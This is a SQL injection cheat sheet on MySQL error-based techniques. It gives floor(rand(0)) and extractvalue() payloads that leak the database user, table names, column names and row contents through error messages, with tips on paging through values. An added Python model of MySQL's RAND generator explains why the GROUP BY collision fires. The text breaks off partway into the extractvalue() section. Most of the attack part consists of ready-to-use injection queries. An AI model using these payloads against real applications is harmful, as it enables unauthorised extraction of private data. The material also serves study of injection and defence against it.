1. floor()
Collect database information: user(), database(), ... (the value is concatenated into the GROUP BY key and leaks through the "Duplicate entry" error):
select * from user where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
Dump table names:
select * from user where id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),'~',(select table_name from information_schema.tables where table_schema=database() limit 0,1))x from information_schema.tables group by x)a);
Dump column names:
select * from user where id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),'~',(select column_name from information_schema.columns where table_name='<table>' limit 0,1))x from information_schema.tables group by x)a);
Dump column contents:
select * from user where id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),'~',(select <column> from <table> limit 0,1))x from information_schema.tables group by x)a);
Notes: the value being leaked must be identical for every row of the row source, otherwise the GROUP BY keys never collide and no error is raised; that is why it is fetched with a scalar subquery and limit N,1 (increase N to walk through tables, columns and rows one at a time), while the row source is any table with at least three rows (information_schema.tables is convenient). rand(0) with a fixed seed makes the collision deterministic; an unseeded rand() only errors sometimes. The leaked value shows up in "Duplicate entry '<value>' for key 'group_key'"; long values are cut off in the message, so page through them with substr().
Why this raises an error: https://www.2cto.com/article/201604/498394.html
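The following is an added illustration of the mechanism behind the floor() error; it is not code from the original page. It re-implements MySQL's RAND(seed) generator (the linear congruential generator from mysys/my_rnd.c, seeded the way Item_func_rand::seed_random seeds RAND(0)) and a simplified model of how the server fills the temporary table for GROUP BY: the group expression is evaluated once to look the key up and, when the key is absent, evaluated a second time to build the row that gets inserted. The GROUP BY model, the DuplicateEntry exception and the error-message text are assumptions made for the illustration; the generator constants are taken from the MySQL source.

```python
"""Model of why `select count(*), concat(secret, floor(rand(0)*2)) x ... group by x`
raises "Duplicate entry ... for key 'group_key'" in MySQL.

Added example; not part of the original page. The GROUP BY temporary-table model
below is a simplified assumption about server internals, not a port of the code.
"""

MAX_VALUE = 0x3FFFFFFF  # rand_struct.max_value in mysys/my_rnd.c


class MySQLRand:
    """Reproduces the sequence MySQL's RAND(seed) returns."""

    def __init__(self, seed: int):
        # Item_func_rand::seed_random:
        #   randominit(rand, (uint32)(seed*0x10001 + 55555555), (uint32)(seed*0x10000001))
        # randominit then reduces both seeds modulo max_value.
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def rand(self) -> float:
        # my_rnd()
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_bits(seed: int, n: int) -> list[int]:
    """The first n values of floor(rand(seed)*2)."""
    r = MySQLRand(seed)
    return [int(r.rand() * 2) for _ in range(n)]  # int() == floor() for values in [0, 2)


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 (ER_DUP_ENTRY)."""


def group_by_count(n_rows: int, secret: str, seed: int = 0) -> dict:
    """Simulate: select count(*), concat(secret, floor(rand(seed)*2)) x
                 from <table with n_rows rows> group by x

    `secret` plays the role of the scalar subquery result (user(), a table name, ...),
    which must be the same for every row; only the rand() bit varies.
    """
    r = MySQLRand(seed)

    def group_key() -> str:
        return f"{secret}{int(r.rand() * 2)}"

    tmp = {}  # the GROUP BY temporary table: key -> count(*)
    for _ in range(n_rows):
        k = group_key()              # 1st evaluation: probe the temporary table
        if k in tmp:
            tmp[k] += 1
            continue
        k = group_key()              # 2nd evaluation: key of the row actually inserted
        if k in tmp:                 # rand() moved on, so the new key may already exist
            raise DuplicateEntry(f"Duplicate entry '{k}' for key 'group_key'")
        tmp[k] = 1
    return tmp


def error_message(n_rows: int, secret: str, seed: int = 0):
    """The error the client would see, or None when the query succeeds."""
    try:
        group_by_count(n_rows, secret, seed)
    except DuplicateEntry as e:
        return str(e)
    return None


if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand_bits(0, 8))
    for rows in (2, 3):
        print(f"{rows} rows:", error_message(rows, "root@localhost"))
```

Walking through it with rand(0): row 1 probes key secret0 (bit 0), misses, and inserts secret1 (bit 1); row 2 probes secret1 (bit 1) and just increments; row 3 probes secret0 (bit 0), misses, and tries to insert secret1 (bit 1), which already exists. That is why the row source needs at least three rows and why the seed must be fixed: with an unseeded rand() the two evaluations collide only by chance.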
2. extractvalue()
Available since MySQL 5.1.5. extractvalue(xml, xpath) raises "XPATH syntax error: '...'" when the XPath expression is malformed; 0x7e is '~', which is not valid XPath, so the rest of the concatenated string is echoed back in the error. The message only shows the first 32 characters of the expression, so read longer values with substr().
select * from user where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
Dump table names:
select * from user where